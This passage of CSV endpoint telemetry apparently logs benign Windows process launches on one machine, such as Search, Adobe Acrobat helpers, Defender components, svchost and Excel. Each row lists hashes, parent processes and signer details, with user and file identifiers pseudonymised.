02:13:19.963183100+00:00,2021-06-25 02:15:05.385294900+00:00,2609343b-aed6-4dc1-b447-4f8cc44ad377,computerpii_0a470890c60768167990033d701e7bd881398861,185308,False,10.7740.19041.1052,False,11540474045144190,,11540474045179015,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+390,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:25:53.767991300+00:00,18952,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe634_ Global\UsGthrCtrlFltPipeMssGthrPipe634 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:25:54.423598300+00:00,2021-06-23 01:27:32.513969400+00:00,80066db4-3615-4cc7-a424-1b9637f31153,computerpii_0a470890c60768167990033d701e7bd881398861,158506,False,10.7740.19041.1052,False,11540474045144190,,11540474045172440,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+391,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:27:10.120186400+00:00,14876,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,3412680,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:19.362041700+00:00,5684,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f7cb604f766e93a9393ab91047022e32e49197c5.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:27:10.148886400+00:00,2021-06-23 01:27:32.516640400+00:00,34ef3a32-a7c9-45f5-8969-a37e9669d7d3,computerpii_0a470890c60768167990033d701e7bd881398861,158541,False,10.7740.19041.1052,False,11540474045172397,,11540474045172450,2021-06-23 01:22:19.362041700+00:00,5684,2021-06-23 01:22:19.362041700+00:00,Acrobat.exe,5684,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:19.361002600+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility
+392,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:27:11.169678400+00:00,17940,AdobeGCClient.exe,"""AdobeGCClient.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat"""" --updaterVersion=""Ipv4PII_794367fc5320f1843f142f7c572c8bf93ab236a7"" --callerId=""10""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:27:10.120186400+00:00,14876,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" --appID=""AcrobatDC1"" --appVersion=""12.0"" --appProfileScope=""acrobatdc1"" --appPath=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\""",False,2021-06-23 01:22:19.362041700+00:00,5684,Acrobat.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:27:11.297663200+00:00,2021-06-23 01:27:32.516734200+00:00,5e87d026-0adf-4ff1-82ec-72a39bbcafd7,computerpii_0a470890c60768167990033d701e7bd881398861,158542,False,10.7740.19041.1052,False,11540474045172450,,11540474045172451,2021-06-23 01:27:10.120186400+00:00,14876,2021-06-23 01:27:10.120186400+00:00,AGCInvokerUtility.exe,14876,256,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3412680,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 01:27:10.122348100+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+393,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 09:22:04.444103600+00:00,10388,dllhost.exe,DllHost.exe /Processid:{FD2C8897-2BE8-459C-B8E4-0D2FCFD341F0},PortableExecutable,2020-10-09 20:47:47.793457100+00:00,C:\Windows\SysWOW64\dllhost.exe,19256,6f3c9485f8f97ac04c8e43ef4463a68c,3ed69caab035258e008efbcf40db305891b40ba02ca2737e20defa7c2d4afaf7,497b8ce238db644b7e1a16b417dbb5bc052a2684,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:22:04.596564700+00:00,2021-06-23 09:23:55.246258700+00:00,c1c692b8-0cb6-46ca-964a-479723f7c15f,computerpii_0a470890c60768167990033d701e7bd881398861,166256,False,10.7740.19041.1052,False,11540474045136908,,11540474045174650,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+394,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:23:37.393864100+00:00,16420,svchost.exe,svchost.exe -k netsvcs -p -s dmwappushservice,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:23:37.490977600+00:00,2021-06-23 09:23:55.247782100+00:00,a57a3ce9-5266-4b5e-968f-cd3ebb04b922,computerpii_0a470890c60768167990033d701e7bd881398861,166291,False,10.7740.19041.1052,False,11540474045136906,,11540474045174658,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+395,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:00:01.373622500+00:00,19084,AdobeARM.exe,"""AdobeARM.exe""",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:00:01.460931200+00:00,2021-06-25 01:02:07.272170+00:00,346a89fe-a3f6-41bc-bcce-bec507c43baf,computerpii_0a470890c60768167990033d701e7bd881398861,182510,False,10.7740.19041.1052,False,11540474045136925,,11540474045178586,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,svchost.exe,1768,16640,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+396,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:00:53.280055600+00:00,1760,SenseCncProxy.exe,4744,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:00:53.657081400+00:00,2021-06-25 01:02:07.273137400+00:00,23fc8e5f-12f2-4099-a033-5efc96dc695e,computerpii_0a470890c60768167990033d701e7bd881398861,182522,False,10.7740.19041.1052,False,11540474045137006,,11540474045178590,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,16512,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+397,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:01:48.868368800+00:00,19076,SenseCncProxy.exe,4560,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:01:49.223215500+00:00,2021-06-25 01:02:07.274230900+00:00,e3cd94ac-0220-4728-995f-c5fb61120936,computerpii_0a470890c60768167990033d701e7bd881398861,182535,False,10.7740.19041.1052,False,11540474045137006,,11540474045178594,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,16512,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+398,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:01:49.973802500+00:00,9036,SenseCncProxy.exe,3288,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:01:50.226860800+00:00,2021-06-25 01:02:07.274503600+00:00,871adbac-f16a-48b2-b695-b3ec0e381669,computerpii_0a470890c60768167990033d701e7bd881398861,182538,False,10.7740.19041.1052,False,11540474045137006,,11540474045178595,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+399,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 01:01:50.892766900+00:00,3076,SenseCncProxy.exe,3844,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:01:51.225589100+00:00,2021-06-25 01:02:07.274661400+00:00,685cc022-1b16-4642-a584-3701709f8892,computerpii_0a470890c60768167990033d701e7bd881398861,182540,False,10.7740.19041.1052,False,11540474045137006,,11540474045178596,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+400,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:18:47.330155300+00:00,20068,audiodg.exe,AUDIODG.EXE 0x320 0x494,PortableExecutable,2021-06-09 01:20:34.938090+00:00,C:\Windows\System32\audiodg.exe,585240,fdbb767a71f688e46b329072806eea51,be7b4d24854a80a2cb08f3f7e8c09e3b06c86b420dc867120306aaa6981a40cc,0c81cd20691e99a139c5c6d6e9e35936b0cb02b9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-10 00:46:11.367562+00:00,3752,svchost.exe,svchost.exe -k LocalServiceNetworkRestricted -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:18:47.684870600+00:00,2021-06-25 02:19:07.524506200+00:00,beed7caf-4bf7-40b4-86c4-2be3a51cbcb4,computerpii_0a470890c60768167990033d701e7bd881398861,185381,False,10.7740.19041.1052,False,11540474045136968,,11540474045179038,2021-06-10 00:46:11.367562+00:00,3752,2021-06-10 00:46:11.367562+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3752,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,audioadg.exe,audioadg.exe,Windows Audio Device Graph Isolation
+401,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 09:22:49.737633300+00:00,8280,EXCEL.EXE,"""EXCEL.EXE""  /Embedding",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 09:22:48.854060200+00:00,6880,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_744c45d2d5b1b74b646025b5099a8d3c8446adc0.xlsx""",False,2021-06-24 